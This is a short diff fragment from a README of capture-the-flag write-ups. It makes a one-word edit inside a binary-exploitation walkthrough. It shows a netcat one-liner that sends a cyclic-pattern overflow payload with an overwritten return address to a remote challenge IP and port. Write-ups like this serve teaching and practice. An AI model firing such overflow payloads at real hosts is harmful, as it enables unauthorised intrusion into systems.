kali-mx/ctf-writeups/README.md

 0x0000ffffe80aeed0 in ?? ()
 ```

 And it works!
-Test flag prints out.
+The test flag prints out.
 Now to take this exploit remotely we just point it to our target like this:

 ` echo -en "1\n$(cyclic 85)\x12\x0B\x40" | nc 188.166.172.138 30681`